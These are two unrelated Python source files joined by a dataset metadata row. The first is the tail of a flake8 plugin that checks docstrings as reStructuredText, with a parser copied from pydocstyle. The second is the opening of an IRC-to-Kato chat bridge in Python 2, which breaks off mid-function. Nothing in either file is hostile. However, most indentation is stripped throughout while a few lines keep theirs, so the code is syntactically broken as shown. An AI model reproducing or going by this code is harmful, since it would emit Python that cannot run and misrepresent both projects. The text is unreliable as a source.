# Given 'foo', match 'foo.bar' but not 'foobar' or 'sfoo'
if re.compile(r"^{}\.".format(self.name)).match(decorator.name):
return False
name_is_public = (
not self.name.startswith("_")
or self.name in VARIADIC_MAGIC_METHODS
or self.is_magic
)
return self.parent.is_public and name_is_public
class Class(Definition):
"""A Python source code class."""
_nest = staticmethod(lambda s: {"def": Method, "class": NestedClass}[s])
is_public = Function.is_public
is_class = True
class NestedClass(Class):
"""A Python source code nested class."""
@property
def is_public(self):
"""Return True iff this class should be considered public."""
return (
not self.name.startswith("_")
and self.parent.is_class
and self.parent.is_public
)
class Decorator(Value):
"""A decorator for function, method or class."""
_fields = "name arguments".split()
VARIADIC_MAGIC_METHODS = ("__init__", "__call__", "__new__")
class AllError(Exception):
"""Raised when there is a problem with __all__ when parsing."""
def __init__(self, message):
"""Initialize the error with a more specific message."""
Exception.__init__(
self,
message
+ textwrap.dedent(
"""
That means pydocstyle cannot decide which definitions are
public. Variable __all__ should be present at most once in
each file, in form
`__all__ = ('a_public_function', 'APublicClass', ...)`.
More info on __all__: http://stackoverflow.com/q/44834/. ')
"""
),
)
class TokenStream(object):
"""Token stream."""
# A logical newline is where a new expression or statement begins. When
# there is a physical new line, but not a logical one, for example:
# (x +
# y)
# The token will be tk.NL, not tk.NEWLINE.
LOGICAL_NEWLINES = {tk.NEWLINE, tk.INDENT, tk.DEDENT}
def __init__(self, filelike):
"""Initialize."""
self._generator = tk.generate_tokens(filelike.readline)
self.current = Token(*next(self._generator, None))
self.line = self.current.start[0]
self.log = log
self.got_logical_newline = True
def move(self):
"""Move."""
previous = self.current
current = self._next_from_generator()
self.current = None if current is None else Token(*current)
self.line = self.current.start[0] if self.current else self.line
self.got_logical_newline = previous.kind in self.LOGICAL_NEWLINES
return previous
def _next_from_generator(self):
try:
return next(self._generator, None)
except (SyntaxError, tk.TokenError):
self.log.warning("error generating tokens", exc_info=True)
return None
def __iter__(self):
"""Iterate."""
while True:
if self.current is not None:
yield self.current
else:
return
self.move()
class TokenKind(int):
"""Kind of token."""
def __repr__(self):
"""Representation."""
return "tk.{}".format(tk.tok_name[self])
class Token(Value):
"""Token."""
_fields = "kind value start end source".split()
def __init__(self, *args):
"""Initialize."""
super(Token, self).__init__(*args)
self.kind = TokenKind(self.kind)
class Parser(object):
"""A Python source code parser."""
def parse(self, filelike, filename):
"""Parse the given file-like object and return its Module object."""
self.log = log
self.source = filelike.readlines()
src = "".join(self.source)
# This may raise a SyntaxError:
compile(src, filename, "exec")
self.stream = TokenStream(StringIO(src))
self.filename = filename
self.all = None
self.future_imports = set()
self._accumulated_decorators = []
return self.parse_module()
# TODO: remove
def __call__(self, *args, **kwargs):
"""Call the parse method."""
return self.parse(*args, **kwargs)
current = property(lambda self: self.stream.current)
line = property(lambda self: self.stream.line)
def consume(self, kind):
"""Consume one token and verify it is of the expected kind."""
next_token = self.stream.move()
assert next_token.kind == kind
def leapfrog(self, kind, value=None):
"""Skip tokens in the stream until a certain token kind is reached.
If `value` is specified, tokens whose values are different will also
be skipped.
"""
while self.current is not None:
if self.current.kind == kind and (
value is None or self.current.value == value
):
self.consume(kind)
return
self.stream.move()
def parse_docstring(self):
"""Parse a single docstring and return its value."""
self.log.debug(
"parsing docstring, token is %r (%s)", self.current.kind, self.current.value
)
while self.current.kind in (tk.COMMENT, tk.NEWLINE, tk.NL):
self.stream.move()
self.log.debug(
"parsing docstring, token is %r (%s)",
self.current.kind,
self.current.value,
)
if self.current.kind == tk.STRING:
docstring = self.current.value
self.stream.move()
return docstring
return None
def parse_decorators(self): # noqa : D401
"""Called after first @ is found.
Parse decorators into self._accumulated_decorators.
Continue to do so until encountering the 'def' or 'class' start token.
"""
name = []
arguments = []
at_arguments = False
while self.current is not None:
self.log.debug(
"parsing decorators, current token is %r (%s)",
self.current.kind,
self.current.value,
)
if self.current.kind == tk.NAME and self.current.value in ["def", "class"]:
# Done with decorators - found function or class proper
break
elif self.current.kind == tk.OP and self.current.value == "@":
# New decorator found. Store the decorator accumulated so far:
self._accumulated_decorators.append(
Decorator("".join(name), "".join(arguments))
)
# Now reset to begin accumulating the new decorator:
name = []
arguments = []
at_arguments = False
elif self.current.kind == tk.OP and self.current.value == "(":
at_arguments = True
elif self.current.kind == tk.OP and self.current.value == ")":
# Ignore close parenthesis
pass
elif self.current.kind == tk.NEWLINE or self.current.kind == tk.NL:
# Ignore newlines
pass
else:
# Keep accumulating current decorator's name or argument.
if not at_arguments:
name.append(self.current.value)
else:
arguments.append(self.current.value)
self.stream.move()
# Add decorator accumulated so far
self._accumulated_decorators.append(
Decorator("".join(name), "".join(arguments))
)
def parse_definitions(self, class_, all=False):
"""Parse multiple definitions and yield them."""
while self.current is not None:
self.log.debug(
"parsing definition list, current token is %r (%s)",
self.current.kind,
self.current.value,
)
self.log.debug("got_newline: %s", self.stream.got_logical_newline)
if all and self.current.value == "__all__":
self.parse_all()
elif (
self.current.kind == tk.OP
and self.current.value == "@"
and self.stream.got_logical_newline
):
self.consume(tk.OP)
self.parse_decorators()
elif self.current.value in ["def", "class"]:
yield self.parse_definition(class_._nest(self.current.value))
elif self.current.kind == tk.INDENT:
self.consume(tk.INDENT)
for definition in self.parse_definitions(class_):
yield definition
elif self.current.kind == tk.DEDENT:
self.consume(tk.DEDENT)
return
elif self.current.value == "from":
self.parse_from_import_statement()
else:
self.stream.move()
def parse_all(self):
"""Parse the __all__ definition in a module."""
assert self.current.value == "__all__"
self.consume(tk.NAME)
if self.current.value != "=":
raise AllError("Could not evaluate contents of __all__. ")
self.consume(tk.OP)
if self.current.value not in "([":
raise AllError("Could not evaluate contents of __all__. ")
self.consume(tk.OP)
self.all = []
all_content = "("
while self.current.kind != tk.OP or self.current.value not in ")]":
if self.current.kind in (tk.NL, tk.COMMENT):
pass
elif self.current.kind == tk.STRING or self.current.value == ",":
all_content += self.current.value
else:
raise AllError(
"Unexpected token kind in __all__: {!r}. ".format(
self.current.kind
)
)
self.stream.move()
self.consume(tk.OP)
all_content += ")"
try:
self.all = eval(all_content, {})
except BaseException as e:
raise AllError(
"Could not evaluate contents of __all__."
"\bThe value was {}. The exception was:\n{}".format(all_content, e)
)
def parse_module(self):
"""Parse a module (and its children) and return a Module object."""
self.log.debug("parsing module.")
start = self.line
docstring = self.parse_docstring()
children = list(self.parse_definitions(Module, all=True))
assert self.current is None, self.current
end = self.line
cls = Module
if self.filename.endswith("__init__.py"):
cls = Package
module = cls(
self.filename,
self.source,
start,
end,
[],
docstring,
children,
None,
self.all,
None,
"",
)
for child in module.children:
child.parent = module
module.future_imports = self.future_imports
self.log.debug("finished parsing module.")
return module
def parse_definition(self, class_):
"""Parse a definition and return its value in a `class_` object."""
start = self.line
self.consume(tk.NAME)
name = self.current.value
self.log.debug("parsing %s '%s'", class_.__name__, name)
self.stream.move()
if self.current.kind == tk.OP and self.current.value == "(":
parenthesis_level = 0
while True:
if self.current.kind == tk.OP:
if self.current.value == "(":
parenthesis_level += 1
elif self.current.value == ")":
parenthesis_level -= 1
if parenthesis_level == 0:
break
self.stream.move()
if self.current.kind != tk.OP or self.current.value != ":":
self.leapfrog(tk.OP, value=":")
else:
self.consume(tk.OP)
if self.current.kind in (tk.NEWLINE, tk.COMMENT):
skipped_error_codes = self.parse_skip_comment()
self.leapfrog(tk.INDENT)
assert self.current.kind != tk.INDENT
docstring = self.parse_docstring()
decorators = self._accumulated_decorators
self.log.debug("current accumulated decorators: %s", decorators)
self._accumulated_decorators = []
self.log.debug("parsing nested definitions.")
children = list(self.parse_definitions(class_))
self.log.debug("finished parsing nested definitions for '%s'", name)
end = self.line - 1
else: # one-liner definition
skipped_error_codes = ""
docstring = self.parse_docstring()
decorators = [] # TODO
children = []
end = self.line
self.leapfrog(tk.NEWLINE)
definition = class_(
name,
self.source,
start,
end,
decorators,
docstring,
children,
None,
skipped_error_codes,
)
for child in definition.children:
child.parent = definition
self.log.debug(
"finished parsing %s '%s'. Next token is %r (%s)",
class_.__name__,
name,
self.current.kind,
self.current.value,
)
return definition
def parse_skip_comment(self):
"""Parse a definition comment for noqa skips."""
skipped_error_codes = ""
if self.current.kind == tk.COMMENT:
if "noqa: " in self.current.value:
skipped_error_codes = "".join(self.current.value.split("noqa: ")[1:])
elif self.current.value.startswith("# noqa"):
skipped_error_codes = "all"
return skipped_error_codes
def check_current(self, kind=None, value=None):
"""Verify the current token is of type `kind` and equals `value`."""
msg = textwrap.dedent(
"""
Unexpected token at line {self.line}:
In file: {self.filename}
Got kind {self.current.kind!r}
Got value {self.current.value}
""".format(
self=self
)
)
kind_valid = self.current.kind == kind if kind else True
value_valid = self.current.value == value if value else True
assert kind_valid and value_valid, msg
def parse_from_import_statement(self):
"""Parse a 'from x import y' statement.
The purpose is to find __future__ statements.
"""
self.log.debug("parsing from/import statement.")
is_future_import = self._parse_from_import_source()
self._parse_from_import_names(is_future_import)
def _parse_from_import_source(self):
"""Parse the 'from x import' part in a 'from x import y' statement.
Return true iff `x` is __future__.
"""
assert self.current.value == "from", self.current.value
self.stream.move()
is_future_import = self.current.value == "__future__"
self.stream.move()
while (
self.current is not None
and self.current.kind in (tk.DOT, tk.NAME, tk.OP)
and self.current.value != "import"
):
self.stream.move()
if self.current is None or self.current.value != "import":
return False
self.check_current(value="import")
assert self.current.value == "import", self.current.value
self.stream.move()
return is_future_import
def _parse_from_import_names(self, is_future_import):
"""Parse the 'y' part in a 'from x import y' statement."""
if self.current.value == "(":
self.consume(tk.OP)
expected_end_kinds = (tk.OP,)
else:
expected_end_kinds = (tk.NEWLINE, tk.ENDMARKER)
while self.current.kind not in expected_end_kinds and not (
self.current.kind == tk.OP and self.current.value == ";"
):
if self.current.kind != tk.NAME:
self.stream.move()
continue
self.log.debug(
"parsing import, token is %r (%s)",
self.current.kind,
self.current.value,
)
if is_future_import:
self.log.debug("found future import: %s", self.current.value)
self.future_imports.add(self.current.value)
self.consume(tk.NAME)
self.log.debug(
"parsing import, token is %r (%s)",
self.current.kind,
self.current.value,
)
if self.current.kind == tk.NAME and self.current.value == "as":
self.consume(tk.NAME) # as
if self.current.kind == tk.NAME:
self.consume(tk.NAME) # new name, irrelevant
if self.current.value == ",":
self.consume(tk.OP)
self.log.debug(
"parsing import, token is %r (%s)",
self.current.kind,
self.current.value,
)
################################################
# End of code copied from pydocstyle/parser.py #
################################################
parse = Parser()
class reStructuredTextChecker(object):
"""Checker of Python docstrings as reStructuredText."""
name = "rst-docstrings"
version = __version__
STDIN_NAMES = {"stdin", "-", "(none)", None}
def __init__(self, tree, filename="(none)"):
"""Initialise."""
self.tree = tree
self.filename = filename
try:
self.load_source()
self.err = None
except Exception as err:
self.source = None
self.err = err
@classmethod
def add_options(cls, parser):
"""Add RST directives and roles options."""
parser.add_option(
"--rst-directives",
metavar="LIST",
default="",
parse_from_config=True,
comma_separated_list=True,
help="Comma-separated list of additional RST directives.",
)
parser.add_option(
"--rst-roles",
metavar="LIST",
default="",
parse_from_config=True,
comma_separated_list=True,
help="Comma-separated list of additional RST roles.",
)
@classmethod
def parse_options(cls, options):
"""Adding black-config option."""
cls.extra_directives = options.rst_directives
cls.extra_roles = options.rst_roles
def run(self):
"""Use docutils to check docstrings are valid RST."""
# Is there any reason not to call load_source here?
if self.err is not None:
assert self.source is None
msg = "%s%03i %s" % (
rst_prefix,
rst_fail_load,
"Failed to load file: %s" % self.err,
)
yield 0, 0, msg, type(self)
module = []
try:
module = parse(StringIO(self.source), self.filename)
except SyntaxError as err:
msg = "%s%03i %s" % (
rst_prefix,
rst_fail_parse,
"Failed to parse file: %s" % err,
)
yield 0, 0, msg, type(self)
module = []
except AllError:
msg = "%s%03i %s" % (
rst_prefix,
rst_fail_all,
"Failed to parse __all__ entry.",
)
yield 0, 0, msg, type(self)
module = []
for definition in module:
if not definition.docstring:
# People can use flake8-docstrings to report missing
# docstrings
continue
try:
# Note we use the PEP257 trim algorithm to remove the
# leading whitespace from each line - this avoids false
# positive severe error "Unexpected section title."
unindented = trim(dequote_docstring(definition.docstring))
# Off load RST validation to reStructuredText-lint
# which calls docutils internally.
# TODO: Should we pass the Python filename as filepath?
rst_errors = list(rst_lint.lint(unindented))
except Exception as err:
# e.g. UnicodeDecodeError
msg = "%s%03i %s" % (
rst_prefix,
rst_fail_lint,
"Failed to lint docstring: %s - %s" % (definition.name, err),
)
yield definition.start, 0, msg, type(self)
continue
for rst_error in rst_errors:
# TODO - make this a configuration option?
if rst_error.level <= 1:
continue
# Levels:
#
# 0 - debug --> we don't receive these
# 1 - info --> RST1## codes
# 2 - warning --> RST2## codes
# 3 - error --> RST3## codes
# 4 - severe --> RST4## codes
#
# Map the string to a unique code:
msg = rst_error.message.split("\n", 1)[0]
code = code_mapping(
rst_error.level, msg, self.extra_directives, self.extra_roles
)
if not code:
# We ignored it, e.g. a known Sphinx role
continue
assert 0 < code < 100, code
code += 100 * rst_error.level
msg = "%s%03i %s" % (rst_prefix, code, msg)
                # This returns the line number by combining the start of the
                # docstring with the offset within it.  We don't know the
                # column number, so it is left as zero.
yield definition.start + rst_error.line, 0, msg, type(self)
def load_source(self):
"""Load the source for the specified file."""
if self.filename in self.STDIN_NAMES:
self.filename = "stdin"
if sys.version_info[0] < 3:
self.source = sys.stdin.read()
else:
self.source = TextIOWrapper(sys.stdin.buffer, errors="ignore").read()
else:
# Could be a Python 2.7 StringIO with no context manager, sigh.
# with tokenize_open(self.filename) as fd:
# self.source = fd.read()
handle = tokenize_open(self.filename)
self.source = handle.read()
handle.close()
| 2.6875
| 3
|
chat.py
|
kato-im/katirc
| 1
|
12777739
|
import re
import os
from twisted.internet import defer
from twisted.python.failure import Failure
from kato import KatoHttpClient
from util import *
# characters that are disallowed from the channel name
CHANNEL_NAME_DISALLOWED = re.compile(r"[^a-zA-Z0-9_-]+", re.UNICODE)
# characters that are disallowed from the nick name
NICKNAME_DISALLOWED = re.compile(r"[^a-zA-Z0-9_-]+", re.UNICODE)
# space handling regex
SPACES = re.compile(r"[\s_]+", re.UNICODE)
# IRC channel <--> Kato room object
class Channel(object):
# IRC channel name, with the channel leading character
irc_channel = ""
# KatoRoom object with which this channel is associated
kato_room = None
# whether the IRC user is in the channel
joined = None
def __init__(self, kato_room):
if not kato_room:
raise ValueError("Must provide Kato room")
self.irc_channel = Channel.create_channel_name(kato_room)
self.joined = False
self.kato_room = kato_room
def __repr__(self):
return "Channel{irc_channel='%s', kato_room='%s', joined=%s}" % \
(self.irc_channel, self.kato_room, self.joined)
# create a channel name from a kato room
@classmethod
def create_channel_name(cls, kato_room):
if kato_room.type == "support_front":
return "#kato_support"
return cls.normalize_channel_name(kato_room.name)
# according to the IRC spec, channels must begin with a '&', '#', '+' or
# '!'. Other than that, they must be at most 50 characters, and must not
# contain a space, control G (ASCII 7), or a comma. The names themselves
# are case insensitive.
#
    # for reasons of practicality, this function:
# - normalizes the channel name to lowercase, prefixed with a #
# - converts all spaces to underscores
# - removes all non-alphanumeric characters
# - truncates to length 50, if needed
#
# in addition, several rooms are given special names, such as the Kato
# support room
# TODO: check for uniqueness, and augment somehow
@classmethod
def normalize_channel_name(cls, name):
name = name.lower()
name = strip_accents(name)
name = SPACES.sub('_', name)
name = CHANNEL_NAME_DISALLOWED.sub('', name)
# second pass, to remove double underscores if the original string
# were "a & b" -> "a__b" -> "a_b"
name = SPACES.sub('_', name)
name = name.strip("_")
name = name[:50]
return "#" + name
# IRC nick <--> Kato account object
class Account(object):
# IRC nickname with which this account is associated
nickname = ""
# KatoAccount object with which this account is associated
# this is None for the pseudo system user
kato_account = None
def __init__(self, kato_account, nickname=None):
self.kato_account = kato_account
if nickname:
self.nickname = nickname
else:
self.nickname = Account.create_nickname(kato_account)
def __repr__(self):
return "Account{nickname='%s', kato_account='%s'}" % \
(self.nickname, self.kato_account)
# create a nickname from a kato account name
@classmethod
def create_nickname(cls, kato_account):
name = kato_account.name
return cls.normalize_nickname(name)
    # according to the IRC spec, nicknames must be of length 9 or shorter,
    # begin with a letter or special character, and consist only of letters,
    # digits, special characters, and a -
    # special characters are defined as %x5B-60 / %x7B-7D
# that is, "[", "]", "\", "`", "_", "^", "{", "|", "}"
#
    # for reasons of practicality, this function:
# - normalizes the user's name to lowercase
# - converts all spaces to underscores
# - removes all non-alphanumeric characters
# - truncates to length *50*, if needed; note that this violates the spec,
# but such short nicknames are silly, and irssi handles more
# TODO: strict mode to override this
#
# TODO: check for uniqueness, and augment somehow
@classmethod
def normalize_nickname(cls, name):
name = name.lower()
name = strip_accents(name)
name = SPACES.sub('_', name)
name = NICKNAME_DISALLOWED.sub('', name)
# second pass, to remove double underscores if the original string
# were "a & b" -> "a__b" -> "a_b"
name = SPACES.sub('_', name)
name = name.strip("_")
name = name[:50]
return name
# TODO: better identifier
# IRC identifier used for a fully-qualified identifier
def irc_ident(self):
return self.nickname + "!" + self.nickname + "@kato"
# object that manages chat operations and state
#
# all verbs here are from the perspective of the IRC client; for example,
# send_message sends a message (received from IRC) to Kato, and
# receive_message delivers a message received from Kato to the local IRC
# client
#
# TODO: use a semaphore to prevent multiple operations at once, so messages stay ordered
class Chat(object):
irc = None
# not initialized until the IRC connection initializes the client with a
# user-provided username/password
kato = None
# list of Channel objects
channels = None
# Account objects, indexed by the Account's ID
accounts = None
# Account object of the current user
account = None
# keep alive times
# units are seconds to an arbitrary point in the past, using os.times()[4]
# (real time)
last_keep_alive_sent = None
last_keep_alive_received = None
def __init__(self, irc):
self.irc = irc
self.accounts = dict()
self.channels = []
# returns True/False depending on whether this chat connection is
# connected to kato
    # see also keep_alive, for keeping the connection open
def is_connected(self):
return self.kato != None
# initializes a Kato connection
# token should be an email / password combination, separated by a space
# on error, a message will be provided to the user from the system user,
# rather than returning an error via this function, and the connection
# will be dropped
def init_kato(self, token):
self.kato = None
kato = KatoHttpClient(KatoMessageReceiver(self))
d_init = defer.Deferred()
parts = token.split(" ", 1)
if len(parts) != 2:
self.receive_system_message("Whoops, your IRC password was not " +
"valid. Please send your Kato username (your email " +
"address) and your Kato password, separated by a space, " +
"as your IRC password.")
self.disconnect()
d_init.errback(ValueError("Invalid token"))
return d_init
email, password = parts
d_login = kato.login(email, password)
# called once all data has been loaded correctly, including members,
# rooms, orgs, etc
def init_success():
d_init.callback(self)
def error(failure=None):
if failure and failure.check(ValueError):
self.receive_system_message("Darn, we could not connect to " +
"Kato. Please check your username and password.")
else:
self.receive_system_message("Woah, something went wrong " +
"when connecting to Kato. Whoops. Sorry about that.")
print "Unable to connect to Kato.", failure
self.kato = None
self.disconnect()
d_init.errback(failure)
# organization members result
# account_list is a list of KatoAccount objects
# see get_organization_members in KatoHttpClient
def org_members_success(account_list):
for account in account_list:
self._add_kato_account(account)
# rooms for a single organization result
# room_list is a list of KatoRoom objects
# see get_rooms in KatoHttpClient
def rooms_success(room_list):
for room in room_list:
self._add_kato_room(room)
# information about a single account
# kato_account is the account of this user
# see get_account_info in KatoHttpClient
def account_info_success(kato_account):
# register account
# cannot set the nickname here because the user may not have given
# the nickname to the server yet
account = self._add_kato_account(kato_account, self.irc.nickname)
# this account is for the current user, so register it specially
self.account = account
# process memberships
deferds = []
for kato_membership in kato_account.memberships:
d_org_members = self.kato.get_organization_members(kato_membership.org_id)
d_org_members.addCallbacks(org_members_success)
deferds.append(d_org_members)
d_org_rooms = self.kato.get_rooms(kato_membership.org_id)
d_org_rooms.addCallbacks(rooms_success)
deferds.append(d_org_rooms)
# after all members and rooms have loaded, trigger
d_loaded = defer.gatherResults(deferds, consumeErrors=True)
def success(param=None):
init_success()
d_loaded.addCallbacks(success, error)
# login succeeded
# pre-fetch account information
def login_success(ignored):
# defined above; allow access chat-wide
self.kato = kato
d_account = self.kato.get_account_info()
d_account.addCallbacks(account_info_success, error)
d_login.addCallbacks(login_success, error)
return d_init
# disconnects
# can be called either from a user-initiated disconnect or a lost Kato
# connection
def disconnect(self):
def loggedout(ignored=None):
print "Closing transport"
self.irc.transport.loseConnection()
def handle_error(failure):
# failed to logout; kill the IRC connection anyways
print "Failed to close Kato connection."
self.irc.transport.loseConnection()
# logout of kato
if self.kato:
d = self.kato.logout()
d.addCallbacks(loggedout, handle_error)
else:
loggedout()
# keep alive
# returns True if is_connected and the connection has successfully
# received a keep alive within keep_alive_timeout
# this requires that keep_alive is called on an interval shorter than
# keep_alive_timeout, leaving time for network overhead of making the keep
# alive call itself
def keep_alive(self, keep_alive_timeout):
if not self.is_connected():
return False
first_keep_alive = self.last_keep_alive_sent is None
self.kato.keep_alive()
self.last_keep_alive_sent = os.times()[4]
if first_keep_alive:
# assume that the connection is good, since we haven't had time to
# receive a keep alive response yet
return True
else:
# we should have received a keep alive - check that the keep alive
# has come back in time
secs_since_last_received = abs(self.last_keep_alive_received - \
self.last_keep_alive_sent)
# allow us to go three keep alive checks before we say we are not
# connected
return secs_since_last_received < keep_alive_timeout
# sends the given message to the given Channel
def send_message(self, channel, message):
message, mentions = self._process_irc_mentions(message)
self.kato.send_message(channel.kato_room, message, mentions)
# replaces IRC mentions with Kato mention text
# returns the modified message + a set of account IDs for everyone
# mentioned
# an IRC mention is defined as follows:
# - mention is the first word, or is proceeded by whitespace
# - mention is the last word, or is followed by a character that is
# disallowed in the nickname
# - the nickname itself may optionally be prepended by an @ character
def _process_irc_mentions(self, message):
mentions = set()
# TODO: limit accounts by those in the organization of the room
for id, account in self.accounts.iteritems():
position = 0
while True:
position = message.find(account.nickname, position)
next_char = position + len(account.nickname)
if position == -1:
position = 0
break
                # before character
                if position == 0:
                    separated_before = True
                else:
                    # search for leading @, which we want to replace too, so
                    # we don't get @@, since we prepend an @ below
                    if message[position - 1] == "@":
                        position -= 1
                    if position == 0:
                        # the leading @ was the very first character
                        separated_before = True
                    else:
                        # require a space before the nick
                        m = SPACES.match(message[position - 1])
                        separated_before = bool(m)
# after character
if next_char == len(message):
separated_after = True
else:
m = NICKNAME_DISALLOWED.match(message[next_char])
separated_after = bool(m)
if separated_before and separated_after:
message = "".join([message[:position], "@", id, message[next_char:]])
mentions.add(id)
# continue searching after the replaced ID + "@"
position = position + 1 + len(id)
else:
# nickname matched, but is part of a bigger word; skip
position = next_char
return message, mentions
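    # Worked example (illustrative, with an assumed account whose nickname is
    # "skylar" and whose Kato ID is "abc123"): the IRC text "ping @skylar now"
    # is rewritten to "ping @abc123 now" and {"abc123"} is returned as the
    # mention set; _process_kato_mentions performs the reverse mapping for
    # incoming messages.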
# receives a message in the given Channel from the given Account and sends it to the client
def receive_message(self, channel, account, message):
# skip messages sent by the current user
if account.kato_account.id == self.kato.account_id:
return
# skip messages from channels that have not been joined
if not channel.joined:
return
# convert Kato mentions to nicknames
message = self._process_kato_mentions(message)
self.irc.privmsg(account.irc_ident(), channel.irc_channel, message)
# TODO: send read event?
# replaces kato mentions with the IRC nickname of the account
# returns a modified message
def _process_kato_mentions(self, message):
# TODO: limit accounts by those in the organization of the room
# TODO: add detection of names, since Kato sometime doesn't do the
# mentions correctly (see @.:. Skylar .:.)
for id, account in self.accounts.iteritems():
message = message.replace("@" + id, account.nickname)
return message
# sends a private message to the given Account
def send_private_message(self, account, message):
message, mentions = self._process_irc_mentions(message)
self.kato.send_private_message(account.kato_account, message, mentions)
# receives a private message from the given Account
def receive_private_message(self, account, message):
# skip messages sent by the current user
if account.kato_account.id == self.kato.account_id:
return
# convert Kato mentions to nicknames
message = self._process_kato_mentions(message)
self.irc.privmsg(account.irc_ident(), account.nickname, message)
# TODO: send read event?
# provides the client with a system message
# this can be used to report error conditions
def receive_system_message(self, message):
self.irc.privmsg(self.irc.SYSTEM_USER,
self.irc.nickname,
message)
# TODO: better error handling
# returns a Channel object for the given IRC channel name, with prefix,
# via a deferred
# if the channel is not valid, then an errback will be sent
def find_channel_from_ircname(self, irc_channel):
def synchronous():
for channel in self.channels:
if channel.irc_channel == irc_channel:
return channel
else:
# channel does not exist yet
raise ValueError("Channel " + irc_channel + " not found")
return defer.maybeDeferred(synchronous)
# returns a Channel object for the given Kato room ID, via a deferred
# if the channel is not valid, then an errback will be sent
def find_channel_from_katoid(self, room_id):
def synchronous():
for channel in self.channels:
if channel.kato_room and channel.kato_room.id == room_id:
return channel
else:
raise ValueError("Room ID is not valid")
return defer.maybeDeferred(synchronous)
# returns an Account for the given IRC nickname, via a deferred
# if the account is not valid, then an errback will be sent
def find_account_from_ircnick(self, nickname):
def synchronous():
for id, account in self.accounts.iteritems():
if account.nickname == nickname:
return account
else:
raise ValueError("Could not find account with IRC nick: " +
nickname)
return defer.maybeDeferred(synchronous)
# returns an Account for the given Kato account ID, via a deferred
# if the account is not valid, then an errback will be sent
def find_account_from_katoid(self, account_id):
def synchronous():
try:
return self.accounts[account_id]
except KeyError:
raise ValueError("Could not find account ID: " + account_id)
return defer.maybeDeferred(synchronous)
# adds/updates a kato account
# updates only affect the kato_account object of the account
def _add_kato_account(self, kato_account, nickname=None):
if kato_account.id in self.accounts:
# update existing account
existing = self.accounts[kato_account.id]
existing.kato_account = kato_account
else:
# new account
self.accounts[kato_account.id] = Account(kato_account, nickname)
        # say hello, so that we can receive and send messages
self.kato.hello_account(kato_account)
return self.accounts[kato_account.id]
# adds/updates a kato room
def _add_kato_room(self, kato_room):
for channel in self.channels:
if channel.kato_room.id == kato_room.id:
# channel already added; update info
channel.kato_room = kato_room
break
else:
# channel does not exist yet; create it
channel = Channel(kato_room)
self.channels.append(channel)
# indicates that the user has joined the given IRC channel
#
# returns a defer that fires with the Channel on success, or with an
# errback if the Kato Room could not be joined, either because it does not
# exist (ValueError) or for network reasons (other)
def join_channel(self, irc_channel):
d = defer.Deferred()
for channel in self.channels:
if channel.irc_channel == irc_channel:
# channel already exists
if channel.joined:
# already in the channel; do nothing
d.callback(channel)
break
else:
# not in the channel yet; enter the channel
self.kato.enter_room(channel.kato_room)
channel.joined = True
d.callback(channel)
break
else:
# channel does not exist yet
d.errback(ValueError(irc_channel +
" does not correspond to a known Kato room."))
return d
# leave an IRC channel
def leave_channel(self, irc_channel):
print "Leaving", irc_channel
for channel in self.channels:
if channel.irc_channel == irc_channel:
print "Leaving channel", channel
channel.joined = False
self.kato.leave_room(channel.kato_room)
# left the room or room was not found; send the part message
# object that receives and acts upon messages from the Kato client
# kato_<MESSAGE_TYPE> will be called with the message
class KatoMessageReceiver(object):
# Chat
chat = None
def __init__(self, chat):
self.chat = chat
# TODO
#def kato_ANNOUNCE(self, message):
# pass
# check message; used to check the status of the client for a given group
# usual check sequence:
#
# server sends check message
# {
# "ts":1379271141415,
# "type":"check",
# "group_id":"<GROUP_ID>"
# }
#
# client responds
# note that the tz_offset is positive for some reason
# {
# "group_id":"<GROUP_ID>",
# "type":"presence",
# "params":{
# "status":"(online|away)",
# "tz_offset":<TZ_OFFSET>,
# "capabilities":[]
# }
# }
#
# server responds with a presence message for the current account
# see kato_PRESENCE
# TODO
#def kato_CHECK(self, message):
# pass
# keep alive message used to check connection status
    # the web client sends a keep alive message every 30 seconds (formerly
    # every 5 seconds), and the server responds
#
# client sends
# {"type":"keep_alive"}
#
# server responds
# {"ts":1379270870453,"type":"keep_alive"}
def kato_KEEP_ALIVE(self, message):
self.chat.last_keep_alive_received = os.times()[4]
# TODO
#def kato_OFF_RECORD(self, message):
# pass
# TODO
#def kato_OMITTED(self, message):
# pass
# TODO
#def kato_ON_RECORD(self, message):
# pass
# used to indicate presence of an account, including the current user
# see kato_CHECK
#
# server sends
# {
# "ts":1379271141455,
# "type":"presence",
# "from":{
# "id":"<ACCOUNT_ID>",
# "status":"(verified_email|unverified_email)",
# "email":"<EMAIL_ADDRESS>",
# "name":"<ACCOUNT_NAME>"
# },
# "group_id":"<GROUP_ID>",
# "params":{
# "status":"(online|away)",
# "tz_offset":<TZ_OFFSET>,
# "capabilities":[]
# }
# }
# TODO
#def kato_PRESENCE(self, message):
# pass
# indicates that a given message has been read
#
# server sends
# {
# "ts":1379272428497,
# "type":"read",
# "from":{
# "id":"<ACCOUNT_ID>",
# "status":"(verified_email|unverified_email)",
# "email":"<EMAIL_ADDRESS>",
# "name":"<NAME>"
# },
# "room_id":"<ROOM_ID>",
# "params":{
# "last_ts":1379272416000,
# "seq":17,
# "diff":0,
# "mentioned":false
# }
# }
def kato_READ(self, message):
pass
# TODO
#def kato_RTC_SIGNAL(self, message):
# pass
# TODO
#def kato_RTC_START(self, message):
# pass
# TODO
#def kato_RTC_STOP(self, message):
# pass
# TODO
#def kato_SILENCE(self, message):
# pass
# a text message
# {
# "ts":1379214315159,
# "type":"text",
# "from":{
# "id":"<ACCOUNT_ID>",
# "status":"(verified_email|unverified_email)",
# "email":"<EMAIL_ADDRESS>",
# "name":"<NAME>"
# },
# # for a chat room, room_id is a hex string
# # for a private message, the lower account ID comes first, followed by the higher accountID
# "room_id":"<ROOM_ID>|<<ACCOUNT_ID>-<ACCOUNT_ID>",
# "params":{
# "data":{
# "id":"25d837dc23fb2e1c",
# # key not provided if no mentions
# "mention_names":{
# "<ACCOUNT_ID>":"<ACCOUNT_NAME>"
# }
# },
# # if a mention, @<NAME> replaced with @<ACCOUNT_ID> in the body
# "text":"<MESSAGE_CONTENTS>",
# "mentions":["<ACCOUNT_ID>"],
# "mentions":[],
# "mentioned_everybody":false
# },
# "seq":1
# }
def kato_TEXT(self, message):
#
# channel message
#
def channel_found(channel):
account_id = message["from"]["id"]
d = self.chat.find_account_from_katoid(account_id)
def sender_found(account):
text = message["params"]["text"]
self.chat.receive_message(channel, account, text)
def sender_not_found(ignored):
# cannot find the sender; fake it
# this happens when an integration of some kind (e.g. Github)
# sends a message; however, Kato doesn't give us permission to
# fetch Github's info from their servers, so we have to just
# pass the message along
kato_account = KatoAccount(account_id,
message["from"]["name"],
"", # no email
message["from"]["status"],
[])
account = Account(kato_account)
